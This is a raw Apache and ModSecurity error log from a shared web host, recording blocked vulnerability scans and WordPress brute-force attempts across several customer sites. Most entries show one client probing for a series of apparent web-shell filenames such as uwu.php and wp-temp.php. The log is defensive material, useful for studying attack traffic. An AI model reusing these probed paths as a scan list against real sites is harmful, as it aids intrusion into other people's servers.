[Tue May 26 14:28:57.493015 2026] [security2:error] [pid 610693:tid 610892] [client 20.195.199.65:57125] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "mail.obinnawrites.com"] [uri "/cgi-sys/403.html"] [unique_id "ahVg0TvNO3hpmlY6M8RpdQAAAEU"]
[Tue May 26 14:28:58.066528 2026] [security2:error] [pid 610693:tid 610889] [client 20.195.199.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.obinnawrites.com"] [uri "/index.php"] [unique_id "ahVg0TvNO3hpmlY6M8RpfgAAAEI"]
[Tue May 26 14:28:58.066557 2026] [security2:error] [pid 610693:tid 610889] [client 20.195.199.65:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "mail.obinnawrites.com"] [uri "/index.php"] [unique_id "ahVg0TvNO3hpmlY6M8RpfgAAAEI"]
[Tue May 26 14:28:58.066792 2026] [security2:error] [pid 610693:tid 610855] [client 20.195.199.65:57125] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "mail.obinnawrites.com"] [uri "/x/"] [unique_id "ahVg0TvNO3hpmlY6M8RpfAAAACA"]
[Tue May 26 14:28:58.068497 2026] [security2:error] [pid 606909:tid 607083] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVg0V0yRtX9qA7aVUVvEAAAALE"]
[Tue May 26 14:28:58.470033 2026] [autoindex:error] [pid 610693:tid 610879] [client 20.195.199.65:57125] AH01276: Cannot serve directory /home2/debatqhn/obinnawrites.com/wp-admin/css/colors/modern/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:28:58.470762 2026] [security2:error] [pid 610693:tid 610879] [client 20.195.199.65:57125] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "mail.obinnawrites.com"] [uri "/cgi-sys/403.html"] [unique_id "ahVg0jvNO3hpmlY6M8RpiwAAADg"]
[Tue May 26 14:28:58.644484 2026] [security2:error] [pid 610693:tid 610867] [client 20.195.199.65:57125] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.obinnawrites.com"] [uri "/uwu.php"] [unique_id "ahVg0jvNO3hpmlY6M8RpjgAAACw"]
[Tue May 26 14:28:58.644680 2026] [security2:error] [pid 610693:tid 610867] [client 20.195.199.65:57125] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.obinnawrites.com"] [uri "/uwu.php"] [unique_id "ahVg0jvNO3hpmlY6M8RpjgAAACw"]
[Tue May 26 14:28:59.307852 2026] [security2:error] [pid 610693:tid 610931] [client 20.195.199.65:57125] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.obinnawrites.com"] [uri "/uwa.php"] [unique_id "ahVg0zvNO3hpmlY6M8RplwAAAGw"]
[Tue May 26 14:28:59.307986 2026] [security2:error] [pid 610693:tid 610931] [client 20.195.199.65:57125] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.obinnawrites.com"] [uri "/uwa.php"] [unique_id "ahVg0zvNO3hpmlY6M8RplwAAAGw"]
[Tue May 26 14:28:59.530517 2026] [security2:error] [pid 610693:tid 610902] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVg0zvNO3hpmlY6M8RpkAAAAE8"]
[Tue May 26 14:28:59.721475 2026] [security2:error] [pid 610693:tid 610922] [client 20.195.199.65:47302] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.obinnawrites.com"] [uri "/crgio.php"] [unique_id "ahVg0zvNO3hpmlY6M8RpngAAAGM"]
[Tue May 26 14:28:59.721595 2026] [security2:error] [pid 610693:tid 610922] [client 20.195.199.65:47302] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.obinnawrites.com"] [uri "/crgio.php"] [unique_id "ahVg0zvNO3hpmlY6M8RpngAAAGM"]
[Tue May 26 14:29:00.264128 2026] [fcgid:warn] [pid 606909:tid 607073] (70014)End of file found: [client 66.132.172.209:11930] mod_fcgid: can't get data from http client
[Tue May 26 14:29:00.390430 2026] [security2:error] [pid 610693:tid 610837] [client 20.195.199.65:48984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.obinnawrites.com"] [uri "/geforce.php"] [unique_id "ahVg1DvNO3hpmlY6M8RprwAAAA4"]
[Tue May 26 14:29:00.390550 2026] [security2:error] [pid 610693:tid 610837] [client 20.195.199.65:48984] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.obinnawrites.com"] [uri "/geforce.php"] [unique_id "ahVg1DvNO3hpmlY6M8RprwAAAA4"]
[Tue May 26 14:29:00.798083 2026] [security2:error] [pid 610693:tid 610939] [client 83.217.213.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVg1DvNO3hpmlY6M8RpvAAAAHQ"], referer: http://anujtradingco.com/homepages/portfolio-photo/
[Tue May 26 14:29:00.833233 2026] [security2:error] [pid 610693:tid 610914] [client 20.195.199.65:58074] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.obinnawrites.com"] [uri "/pucci.php"] [unique_id "ahVg1DvNO3hpmlY6M8RpvQAAAFs"]
[Tue May 26 14:29:00.833331 2026] [security2:error] [pid 610693:tid 610914] [client 20.195.199.65:58074] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.obinnawrites.com"] [uri "/pucci.php"] [unique_id "ahVg1DvNO3hpmlY6M8RpvQAAAFs"]
[Tue May 26 14:29:00.941051 2026] [security2:error] [pid 606909:tid 607109] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVg1F0yRtX9qA7aVUVvLwAAAMs"]
[Tue May 26 14:29:01.227907 2026] [autoindex:error] [pid 606909:tid 607041] [client 20.195.199.65:0] AH01276: Cannot serve directory /home2/debatqhn/obinnawrites.com/wp-includes/blocks/details/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:29:01.228614 2026] [security2:error] [pid 606909:tid 607041] [client 20.195.199.65:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "mail.obinnawrites.com"] [uri "/cgi-sys/403.html"] [unique_id "ahVg1V0yRtX9qA7aVUVvNAAAAIc"]
[Tue May 26 14:29:01.229035 2026] [security2:error] [pid 610693:tid 610879] [client 20.195.199.65:51099] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "mail.obinnawrites.com"] [uri "/wp-includes/blocks/details/"] [unique_id "ahVg1TvNO3hpmlY6M8RpwwAAADg"]
[Tue May 26 14:29:01.424947 2026] [autoindex:error] [pid 610693:tid 610900] [client 20.195.199.65:0] AH01276: Cannot serve directory /home2/debatqhn/obinnawrites.com/wp-includes/blocks/audio/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:29:01.425577 2026] [security2:error] [pid 610693:tid 610900] [client 20.195.199.65:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "mail.obinnawrites.com"] [uri "/cgi-sys/403.html"] [unique_id "ahVg1TvNO3hpmlY6M8RpxwAAAE0"]
[Tue May 26 14:29:01.426029 2026] [security2:error] [pid 610693:tid 610880] [client 20.195.199.65:51099] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "mail.obinnawrites.com"] [uri "/wp-includes/blocks/audio/"] [unique_id "ahVg1TvNO3hpmlY6M8RpxQAAADk"]
[Tue May 26 14:29:01.602285 2026] [security2:error] [pid 610693:tid 610916] [client 20.195.199.65:51099] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.obinnawrites.com"] [uri "/one.php"] [unique_id "ahVg1TvNO3hpmlY6M8RpyQAAAF0"]
[Tue May 26 14:29:01.603139 2026] [security2:error] [pid 610693:tid 610916] [client 20.195.199.65:51099] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.obinnawrites.com"] [uri "/one.php"] [unique_id "ahVg1TvNO3hpmlY6M8RpyQAAAF0"]
[Tue May 26 14:29:01.674918 2026] [security2:error] [pid 610693:tid 610888] [client 114.119.143.151:43921] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "preetishah.com"] [uri "/category/100-stories-of-she/chapter5/"] [unique_id "ahVg1TvNO3hpmlY6M8RpywAAAEE"], referer: https://preetishah.com/
[Tue May 26 14:29:02.080358 2026] [security2:error] [pid 606909:tid 607137] [client 20.195.199.65:51127] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.obinnawrites.com"] [uri "/wp-temp.php"] [unique_id "ahVg1l0yRtX9qA7aVUVvPgAAAOc"]
[Tue May 26 14:29:02.080470 2026] [security2:error] [pid 606909:tid 607137] [client 20.195.199.65:51127] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.obinnawrites.com"] [uri "/wp-temp.php"] [unique_id "ahVg1l0yRtX9qA7aVUVvPgAAAOc"]
[Tue May 26 14:29:02.472176 2026] [autoindex:error] [pid 610693:tid 610832] [client 20.195.199.65:0] AH01276: Cannot serve directory /home2/debatqhn/obinnawrites.com/wp-includes/blocks/buttons/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:29:02.472817 2026] [security2:error] [pid 610693:tid 610832] [client 20.195.199.65:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "mail.obinnawrites.com"] [uri "/cgi-sys/403.html"] [unique_id "ahVg1jvNO3hpmlY6M8Rp2wAAAAk"]
[Tue May 26 14:29:02.473248 2026] [security2:error] [pid 606909:tid 607069] [client 20.195.199.65:58111] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "mail.obinnawrites.com"] [uri "/wp-includes/blocks/buttons/"] [unique_id "ahVg1l0yRtX9qA7aVUVvQQAAAKM"]
[Tue May 26 14:29:02.643281 2026] [security2:error] [pid 606909:tid 607130] [client 20.195.199.65:58111] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.obinnawrites.com"] [uri "/xmu.php"] [unique_id "ahVg1l0yRtX9qA7aVUVvQgAAAOA"]
[Tue May 26 14:29:02.643389 2026] [security2:error] [pid 606909:tid 607130] [client 20.195.199.65:58111] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.obinnawrites.com"] [uri "/xmu.php"] [unique_id "ahVg1l0yRtX9qA7aVUVvQgAAAOA"]
[Tue May 26 14:29:03.069939 2026] [security2:error] [pid 610693:tid 610833] [client 20.195.199.65:23980] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.obinnawrites.com"] [uri "/mode.php"] [unique_id "ahVg1zvNO3hpmlY6M8Rp5QAAAAo"]
[Tue May 26 14:29:03.070064 2026] [security2:error] [pid 610693:tid 610833] [client 20.195.199.65:23980] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.obinnawrites.com"] [uri "/mode.php"] [unique_id "ahVg1zvNO3hpmlY6M8Rp5QAAAAo"]
[Tue May 26 14:29:03.443173 2026] [security2:error] [pid 610693:tid 610886] [client 20.195.199.65:48995] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.obinnawrites.com"] [uri "/wp-admin/js/index.php"] [unique_id "ahVg1zvNO3hpmlY6M8Rp7wAAAD8"]
[Tue May 26 14:29:03.443284 2026] [security2:error] [pid 610693:tid 610886] [client 20.195.199.65:48995] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.obinnawrites.com"] [uri "/wp-admin/js/index.php"] [unique_id "ahVg1zvNO3hpmlY6M8Rp7wAAAD8"]
[Tue May 26 14:29:03.689567 2026] [security2:error] [pid 610693:tid 610846] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVg1zvNO3hpmlY6M8Rp7QAAABc"]
[Tue May 26 14:29:03.787821 2026] [security2:error] [pid 610693:tid 610924] [client 20.195.199.65:58087] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.obinnawrites.com"] [uri "/dx.php"] [unique_id "ahVg1zvNO3hpmlY6M8Rp8wAAAGU"]
[Tue May 26 14:29:03.787925 2026] [security2:error] [pid 610693:tid 610924] [client 20.195.199.65:58087] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.obinnawrites.com"] [uri "/dx.php"] [unique_id "ahVg1zvNO3hpmlY6M8Rp8wAAAGU"]
[Tue May 26 14:29:04.226028 2026] [security2:error] [pid 610693:tid 610916] [client 20.195.199.65:35244] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.obinnawrites.com"] [uri "/puc.php"] [unique_id "ahVg2DvNO3hpmlY6M8Rp_AAAAF0"]
[Tue May 26 14:29:04.226124 2026] [security2:error] [pid 610693:tid 610916] [client 20.195.199.65:35244] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.obinnawrites.com"] [uri "/puc.php"] [unique_id "ahVg2DvNO3hpmlY6M8Rp_AAAAF0"]
[Tue May 26 14:29:04.625616 2026] [security2:error] [pid 606909:tid 607154] [client 20.195.199.65:51119] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.obinnawrites.com"] [uri "/themes.php"] [unique_id "ahVg2F0yRtX9qA7aVUVvUQAAAPg"]
[Tue May 26 14:29:04.625756 2026] [security2:error] [pid 606909:tid 607154] [client 20.195.199.65:51119] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.obinnawrites.com"] [uri "/themes.php"] [unique_id "ahVg2F0yRtX9qA7aVUVvUQAAAPg"]
[Tue May 26 14:29:05.244117 2026] [security2:error] [pid 606909:tid 607131] [client 85.208.96.201:53250] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahVg2V0yRtX9qA7aVUVvWQAAAOE"]
[Tue May 26 14:29:05.244242 2026] [security2:error] [pid 606909:tid 607131] [client 85.208.96.201:53250] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahVg2V0yRtX9qA7aVUVvWQAAAOE"]
[Tue May 26 14:29:05.251063 2026] [security2:error] [pid 606909:tid 607064] [client 20.195.199.65:40801] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.obinnawrites.com"] [uri "/dx.php"] [unique_id "ahVg2V0yRtX9qA7aVUVvWgAAAJ4"]
[Tue May 26 14:29:05.251154 2026] [security2:error] [pid 606909:tid 607064] [client 20.195.199.65:40801] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.obinnawrites.com"] [uri "/dx.php"] [unique_id "ahVg2V0yRtX9qA7aVUVvWgAAAJ4"]
[Tue May 26 14:29:05.755732 2026] [security2:error] [pid 610693:tid 610860] [client 20.195.199.65:58078] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.obinnawrites.com"] [uri "/11.php"] [unique_id "ahVg2TvNO3hpmlY6M8RqGAAAACU"]
[Tue May 26 14:29:05.755848 2026] [security2:error] [pid 610693:tid 610860] [client 20.195.199.65:58078] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.obinnawrites.com"] [uri "/11.php"] [unique_id "ahVg2TvNO3hpmlY6M8RqGAAAACU"]
[Tue May 26 14:29:05.966258 2026] [security2:error] [pid 610693:tid 610892] [client 202.141.83.254:53891] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVg2TvNO3hpmlY6M8RqHAAAAEU"]
[Tue May 26 14:29:05.966360 2026] [security2:error] [pid 610693:tid 610892] [client 202.141.83.254:53891] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVg2TvNO3hpmlY6M8RqHAAAAEU"]
[Tue May 26 14:29:07.346417 2026] [security2:error] [pid 606909:tid 607050] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVg2l0yRtX9qA7aVUVvZAAAAJA"]
[Tue May 26 14:29:07.831908 2026] [security2:error] [pid 606909:tid 607001] [remote 103.11.102.106:37146] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahVg210yRtX9qA7aVUVvagAAy1s"]
[Tue May 26 14:29:08.693102 2026] [security2:error] [pid 610693:tid 610856] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVg3DvNO3hpmlY6M8RqQgAAACE"]
[Tue May 26 14:29:09.403229 2026] [security2:error] [pid 610693:tid 610746] [remote 124.156.212.23:8680] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 23.212.156.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahVg3TvNO3hpmlY6M8RqVwAARTQ"]
[Tue May 26 14:29:09.696894 2026] [security2:error] [pid 606909:tid 607007] [remote 211.23.68.235:9385] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVg3V0yRtX9qA7aVUVvgAAA6mE"]
[Tue May 26 14:29:10.558557 2026] [security2:error] [pid 610693:tid 610947] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVg3jvNO3hpmlY6M8RqXQAAAHw"]
[Tue May 26 14:29:11.549002 2026] [security2:error] [pid 606909:tid 607110] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVg310yRtX9qA7aVUVvngAAAMw"]
[Tue May 26 14:29:12.887282 2026] [fcgid:warn] [pid 610693:tid 610882] (70014)End of file found: [client 199.45.155.65:41902] mod_fcgid: can't get data from http client
[Tue May 26 14:29:13.500718 2026] [security2:error] [pid 606909:tid 607132] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVg4V0yRtX9qA7aVUVvvgAAAOI"]
